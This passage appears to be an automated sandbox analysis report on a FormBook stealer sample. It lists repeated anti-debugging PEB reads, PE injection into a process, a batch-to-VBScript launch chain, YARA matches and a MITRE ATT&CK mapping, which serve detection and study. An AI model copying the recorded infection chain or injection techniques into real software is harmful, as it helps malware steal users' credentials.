            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014672A0 mov eax, dword ptr fs:[00000030h]7_2_014672A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF2D0 mov eax, dword ptr fs:[00000030h]7_2_013FF2D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF2D0 mov eax, dword ptr fs:[00000030h]7_2_013FF2D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014992A6 mov eax, dword ptr fs:[00000030h]7_2_014992A6
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014992A6 mov eax, dword ptr fs:[00000030h]7_2_014992A6
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014992A6 mov eax, dword ptr fs:[00000030h]7_2_014992A6
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014992A6 mov eax, dword ptr fs:[00000030h]7_2_014992A6
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CB2D3 mov eax, dword ptr fs:[00000030h]7_2_013CB2D3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CB2D3 mov eax, dword ptr fs:[00000030h]7_2_013CB2D3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CB2D3 mov eax, dword ptr fs:[00000030h]7_2_013CB2D3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D92C5 mov eax, dword ptr fs:[00000030h]7_2_013D92C5
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D92C5 mov eax, dword ptr fs:[00000030h]7_2_013D92C5
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014592BC mov eax, dword ptr fs:[00000030h]7_2_014592BC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014592BC mov eax, dword ptr fs:[00000030h]7_2_014592BC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014592BC mov ecx, dword ptr fs:[00000030h]7_2_014592BC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014592BC mov ecx, dword ptr fs:[00000030h]7_2_014592BC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA2C3 mov eax, dword ptr fs:[00000030h]7_2_013DA2C3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA2C3 mov eax, dword ptr fs:[00000030h]7_2_013DA2C3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA2C3 mov eax, dword ptr fs:[00000030h]7_2_013DA2C3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA2C3 mov eax, dword ptr fs:[00000030h]7_2_013DA2C3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA2C3 mov eax, dword ptr fs:[00000030h]7_2_013DA2C3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FB2C0 mov eax, dword ptr fs:[00000030h]7_2_013FB2C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FB2C0 mov eax, dword ptr fs:[00000030h]7_2_013FB2C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FB2C0 mov eax, dword ptr fs:[00000030h]7_2_013FB2C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FB2C0 mov eax, dword ptr fs:[00000030h]7_2_013FB2C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FB2C0 mov eax, dword ptr fs:[00000030h]7_2_013FB2C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FB2C0 mov eax, dword ptr fs:[00000030h]7_2_013FB2C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FB2C0 mov eax, dword ptr fs:[00000030h]7_2_013FB2C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE53E mov eax, dword ptr fs:[00000030h]7_2_013FE53E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE53E mov eax, dword ptr fs:[00000030h]7_2_013FE53E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE53E mov eax, dword ptr fs:[00000030h]7_2_013FE53E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE53E mov eax, dword ptr fs:[00000030h]7_2_013FE53E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE53E mov eax, dword ptr fs:[00000030h]7_2_013FE53E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DD534 mov eax, dword ptr fs:[00000030h]7_2_013DD534
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DD534 mov eax, dword ptr fs:[00000030h]7_2_013DD534
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DD534 mov eax, dword ptr fs:[00000030h]7_2_013DD534
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DD534 mov eax, dword ptr fs:[00000030h]7_2_013DD534
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DD534 mov eax, dword ptr fs:[00000030h]7_2_013DD534
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DD534 mov eax, dword ptr fs:[00000030h]7_2_013DD534
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E0535 mov eax, dword ptr fs:[00000030h]7_2_013E0535
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E0535 mov eax, dword ptr fs:[00000030h]7_2_013E0535
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E0535 mov eax, dword ptr fs:[00000030h]7_2_013E0535
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E0535 mov eax, dword ptr fs:[00000030h]7_2_013E0535
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E0535 mov eax, dword ptr fs:[00000030h]7_2_013E0535
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E0535 mov eax, dword ptr fs:[00000030h]7_2_013E0535
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140656A mov eax, dword ptr fs:[00000030h]7_2_0140656A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140656A mov eax, dword ptr fs:[00000030h]7_2_0140656A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140656A mov eax, dword ptr fs:[00000030h]7_2_0140656A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140B570 mov eax, dword ptr fs:[00000030h]7_2_0140B570
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140B570 mov eax, dword ptr fs:[00000030h]7_2_0140B570
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01407505 mov eax, dword ptr fs:[00000030h]7_2_01407505
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01407505 mov ecx, dword ptr fs:[00000030h]7_2_01407505
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A4500 mov eax, dword ptr fs:[00000030h]7_2_014A4500
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A4500 mov eax, dword ptr fs:[00000030h]7_2_014A4500
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A4500 mov eax, dword ptr fs:[00000030h]7_2_014A4500
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A4500 mov eax, dword ptr fs:[00000030h]7_2_014A4500
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A4500 mov eax, dword ptr fs:[00000030h]7_2_014A4500
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A4500 mov eax, dword ptr fs:[00000030h]7_2_014A4500
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A4500 mov eax, dword ptr fs:[00000030h]7_2_014A4500
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CB562 mov eax, dword ptr fs:[00000030h]7_2_013CB562
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147F525 mov eax, dword ptr fs:[00000030h]7_2_0147F525
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147F525 mov eax, dword ptr fs:[00000030h]7_2_0147F525
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147F525 mov eax, dword ptr fs:[00000030h]7_2_0147F525
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147F525 mov eax, dword ptr fs:[00000030h]7_2_0147F525
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147F525 mov eax, dword ptr fs:[00000030h]7_2_0147F525
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147F525 mov eax, dword ptr fs:[00000030h]7_2_0147F525
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147F525 mov eax, dword ptr fs:[00000030h]7_2_0147F525
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148B52F mov eax, dword ptr fs:[00000030h]7_2_0148B52F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D8550 mov eax, dword ptr fs:[00000030h]7_2_013D8550
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D8550 mov eax, dword ptr fs:[00000030h]7_2_013D8550
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140D530 mov eax, dword ptr fs:[00000030h]7_2_0140D530
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140D530 mov eax, dword ptr fs:[00000030h]7_2_0140D530
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A5537 mov eax, dword ptr fs:[00000030h]7_2_014A5537
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014055C0 mov eax, dword ptr fs:[00000030h]7_2_014055C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A55C9 mov eax, dword ptr fs:[00000030h]7_2_014A55C9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F45B1 mov eax, dword ptr fs:[00000030h]7_2_013F45B1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F45B1 mov eax, dword ptr fs:[00000030h]7_2_013F45B1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E5CF mov eax, dword ptr fs:[00000030h]7_2_0140E5CF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E5CF mov eax, dword ptr fs:[00000030h]7_2_0140E5CF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF5B0 mov eax, dword ptr fs:[00000030h]7_2_013FF5B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF5B0 mov eax, dword ptr fs:[00000030h]7_2_013FF5B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF5B0 mov eax, dword ptr fs:[00000030h]7_2_013FF5B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF5B0 mov eax, dword ptr fs:[00000030h]7_2_013FF5B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF5B0 mov eax, dword ptr fs:[00000030h]7_2_013FF5B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF5B0 mov eax, dword ptr fs:[00000030h]7_2_013FF5B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF5B0 mov eax, dword ptr fs:[00000030h]7_2_013FF5B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF5B0 mov eax, dword ptr fs:[00000030h]7_2_013FF5B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF5B0 mov eax, dword ptr fs:[00000030h]7_2_013FF5B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140A5D0 mov eax, dword ptr fs:[00000030h]7_2_0140A5D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140A5D0 mov eax, dword ptr fs:[00000030h]7_2_0140A5D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144D5D0 mov eax, dword ptr fs:[00000030h]7_2_0144D5D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144D5D0 mov ecx, dword ptr fs:[00000030h]7_2_0144D5D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15A9 mov eax, dword ptr fs:[00000030h]7_2_013F15A9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15A9 mov eax, dword ptr fs:[00000030h]7_2_013F15A9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15A9 mov eax, dword ptr fs:[00000030h]7_2_013F15A9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15A9 mov eax, dword ptr fs:[00000030h]7_2_013F15A9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15A9 mov eax, dword ptr fs:[00000030h]7_2_013F15A9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A35D7 mov eax, dword ptr fs:[00000030h]7_2_014A35D7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A35D7 mov eax, dword ptr fs:[00000030h]7_2_014A35D7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A35D7 mov eax, dword ptr fs:[00000030h]7_2_014A35D7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140C5ED mov eax, dword ptr fs:[00000030h]7_2_0140C5ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140C5ED mov eax, dword ptr fs:[00000030h]7_2_0140C5ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C758F mov eax, dword ptr fs:[00000030h]7_2_013C758F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C758F mov eax, dword ptr fs:[00000030h]7_2_013C758F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C758F mov eax, dword ptr fs:[00000030h]7_2_013C758F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D2582 mov eax, dword ptr fs:[00000030h]7_2_013D2582
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D2582 mov ecx, dword ptr fs:[00000030h]7_2_013D2582
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01404588 mov eax, dword ptr fs:[00000030h]7_2_01404588
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15F4 mov eax, dword ptr fs:[00000030h]7_2_013F15F4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15F4 mov eax, dword ptr fs:[00000030h]7_2_013F15F4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15F4 mov eax, dword ptr fs:[00000030h]7_2_013F15F4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15F4 mov eax, dword ptr fs:[00000030h]7_2_013F15F4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15F4 mov eax, dword ptr fs:[00000030h]7_2_013F15F4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F15F4 mov eax, dword ptr fs:[00000030h]7_2_013F15F4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145B594 mov eax, dword ptr fs:[00000030h]7_2_0145B594
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145B594 mov eax, dword ptr fs:[00000030h]7_2_0145B594
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE5E7 mov eax, dword ptr fs:[00000030h]7_2_013FE5E7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE5E7 mov eax, dword ptr fs:[00000030h]7_2_013FE5E7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE5E7 mov eax, dword ptr fs:[00000030h]7_2_013FE5E7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE5E7 mov eax, dword ptr fs:[00000030h]7_2_013FE5E7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE5E7 mov eax, dword ptr fs:[00000030h]7_2_013FE5E7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE5E7 mov eax, dword ptr fs:[00000030h]7_2_013FE5E7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE5E7 mov eax, dword ptr fs:[00000030h]7_2_013FE5E7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FE5E7 mov eax, dword ptr fs:[00000030h]7_2_013FE5E7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E59C mov eax, dword ptr fs:[00000030h]7_2_0140E59C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D25E0 mov eax, dword ptr fs:[00000030h]7_2_013D25E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014505A7 mov eax, dword ptr fs:[00000030h]7_2_014505A7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014505A7 mov eax, dword ptr fs:[00000030h]7_2_014505A7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014505A7 mov eax, dword ptr fs:[00000030h]7_2_014505A7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F95DA mov eax, dword ptr fs:[00000030h]7_2_013F95DA
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D65D0 mov eax, dword ptr fs:[00000030h]7_2_013D65D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148F5BE mov eax, dword ptr fs:[00000030h]7_2_0148F5BE
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014635BA mov eax, dword ptr fs:[00000030h]7_2_014635BA
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014635BA mov eax, dword ptr fs:[00000030h]7_2_014635BA
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014635BA mov eax, dword ptr fs:[00000030h]7_2_014635BA
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014635BA mov eax, dword ptr fs:[00000030h]7_2_014635BA
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E443 mov eax, dword ptr fs:[00000030h]7_2_0140E443
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E443 mov eax, dword ptr fs:[00000030h]7_2_0140E443
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E443 mov eax, dword ptr fs:[00000030h]7_2_0140E443
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E443 mov eax, dword ptr fs:[00000030h]7_2_0140E443
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E443 mov eax, dword ptr fs:[00000030h]7_2_0140E443
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E443 mov eax, dword ptr fs:[00000030h]7_2_0140E443
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E443 mov eax, dword ptr fs:[00000030h]7_2_0140E443
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E443 mov eax, dword ptr fs:[00000030h]7_2_0140E443
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148F453 mov eax, dword ptr fs:[00000030h]7_2_0148F453
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CC427 mov eax, dword ptr fs:[00000030h]7_2_013CC427
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CE420 mov eax, dword ptr fs:[00000030h]7_2_013CE420
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CE420 mov eax, dword ptr fs:[00000030h]7_2_013CE420
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CE420 mov eax, dword ptr fs:[00000030h]7_2_013CE420
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F340D mov eax, dword ptr fs:[00000030h]7_2_013F340D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A547F mov eax, dword ptr fs:[00000030h]7_2_014A547F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01408402 mov eax, dword ptr fs:[00000030h]7_2_01408402
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01408402 mov eax, dword ptr fs:[00000030h]7_2_01408402
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01408402 mov eax, dword ptr fs:[00000030h]7_2_01408402
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FA470 mov eax, dword ptr fs:[00000030h]7_2_013FA470
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FA470 mov eax, dword ptr fs:[00000030h]7_2_013FA470
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FA470 mov eax, dword ptr fs:[00000030h]7_2_013FA470
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D1460 mov eax, dword ptr fs:[00000030h]7_2_013D1460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D1460 mov eax, dword ptr fs:[00000030h]7_2_013D1460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D1460 mov eax, dword ptr fs:[00000030h]7_2_013D1460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D1460 mov eax, dword ptr fs:[00000030h]7_2_013D1460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D1460 mov eax, dword ptr fs:[00000030h]7_2_013D1460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EF460 mov eax, dword ptr fs:[00000030h]7_2_013EF460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EF460 mov eax, dword ptr fs:[00000030h]7_2_013EF460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EF460 mov eax, dword ptr fs:[00000030h]7_2_013EF460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EF460 mov eax, dword ptr fs:[00000030h]7_2_013EF460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EF460 mov eax, dword ptr fs:[00000030h]7_2_013EF460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EF460 mov eax, dword ptr fs:[00000030h]7_2_013EF460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C645D mov eax, dword ptr fs:[00000030h]7_2_013C645D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F245A mov eax, dword ptr fs:[00000030h]7_2_013F245A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140A430 mov eax, dword ptr fs:[00000030h]7_2_0140A430
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DB440 mov eax, dword ptr fs:[00000030h]7_2_013DB440
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DB440 mov eax, dword ptr fs:[00000030h]7_2_013DB440
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DB440 mov eax, dword ptr fs:[00000030h]7_2_013DB440
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DB440 mov eax, dword ptr fs:[00000030h]7_2_013DB440
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DB440 mov eax, dword ptr fs:[00000030h]7_2_013DB440
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DB440 mov eax, dword ptr fs:[00000030h]7_2_013DB440
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A54DB mov eax, dword ptr fs:[00000030h]7_2_014A54DB
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D64AB mov eax, dword ptr fs:[00000030h]7_2_013D64AB
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014794E0 mov eax, dword ptr fs:[00000030h]7_2_014794E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D9486 mov eax, dword ptr fs:[00000030h]7_2_013D9486
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D9486 mov eax, dword ptr fs:[00000030h]7_2_013D9486
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CB480 mov eax, dword ptr fs:[00000030h]7_2_013CB480
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\user\AppData\Local\Temp\x.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\Desktop\FS001_ DT103024.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.x.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2389064110.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.x.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2389064110.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information22
            Scripting            		Valid AccountsWindows Management Instrumentation22
            Scripting            		111
            Process Injection            		1
            Masquerading            		OS Credential Dumping121
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
            Virtualization/Sandbox Evasion            		Security Account Manager41
